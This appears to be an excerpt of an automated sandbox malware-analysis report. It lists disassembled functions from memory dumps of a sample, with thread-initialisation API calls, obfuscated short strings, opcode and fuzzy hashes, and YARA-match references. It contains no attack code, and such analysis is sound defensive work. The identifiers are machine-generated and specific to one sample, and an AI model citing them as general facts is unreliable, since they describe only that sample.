                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction ID: ced717938db960ffb86bfc66e2cb81337620bd3240a0c6bb8509d39509613d49
                      • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction Fuzzy Hash: 210126B0F00244DFCB10EFB8EC40D6AB7A0A799310BA04179D536AB290DB35B8018B05
                      Function 049480E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04948155
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction ID: a76d8c0da3bd43c517cb6c8633e47b6ba9047f3d1c89867115d964fd2ba21ff6
                      • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction Fuzzy Hash: D40126F0F41204DBD720EFB8EC40E6AB7B0AB89300FA005BAE41957360DB3568418B05
                      Function 00407830 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407899
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$A@K.
                      • API String ID: 2296764815-2457859030
                      • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                      • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                      Function 00407940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004079A9
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$ZYA.
                      • API String ID: 2296764815-4236202813
                      • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                      • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                      Function 00406DD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406E39
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: ZF\K$three
                      • API String ID: 2296764815-3094064056
                      • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                      • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                      Function 04947037 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049470A0
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: ZF\K$three
                      • API String ID: 4132704954-3094064056
                      • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction ID: 32f0fb0bbcc497bc16eab79356d9c0302661b9f5b6920db0582996432697a803
                      • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction Fuzzy Hash: 0801AD74F04208DBCB20DFF8E941F4DB3B0AB94314FA001BAD815A73A0D7346906DB19
                      Function 04947A97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04947B00
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$A@K.
                      • API String ID: 4132704954-2457859030
                      • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction ID: ae6e38a2d9a790e630d43c400321147d89a6ac1431e6e1726f08a19ab9d4445d
                      • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction Fuzzy Hash: 130181B4F40208DFC720DFA8E946E5DB7B0E788304FA001BAD916A7390D775AA458B59
                      Function 04947BA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04947C10
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$ZYA.
                      • API String ID: 4132704954-4236202813
                      • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction ID: 9f387d827fc8b13cf67346f365b1805bc6b9ede67e1448d65a2eaf7ca2632e97
                      • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction Fuzzy Hash: 6C01AD74F00208DFCB24EFA8E991A4DBBB0EB84310F9000BAD82557350D6757945CB49
                      Function 00406C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406C99
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: CGV.$mix
                      • API String ID: 2296764815-1644454629
                      • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                      • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
                      Function 04946EA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04946F00
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: CGV.$mix
                      • API String ID: 4132704954-1644454629
                      • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction ID: d34299010a2d6706f61b62430f6ca4b715352e3984b3d41a14ebe1e696052168
                      • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction Fuzzy Hash: B7F096B4F44204DBDB10EFB8E942E5D77E0AB85314FE001B5E90697390D6357A458B59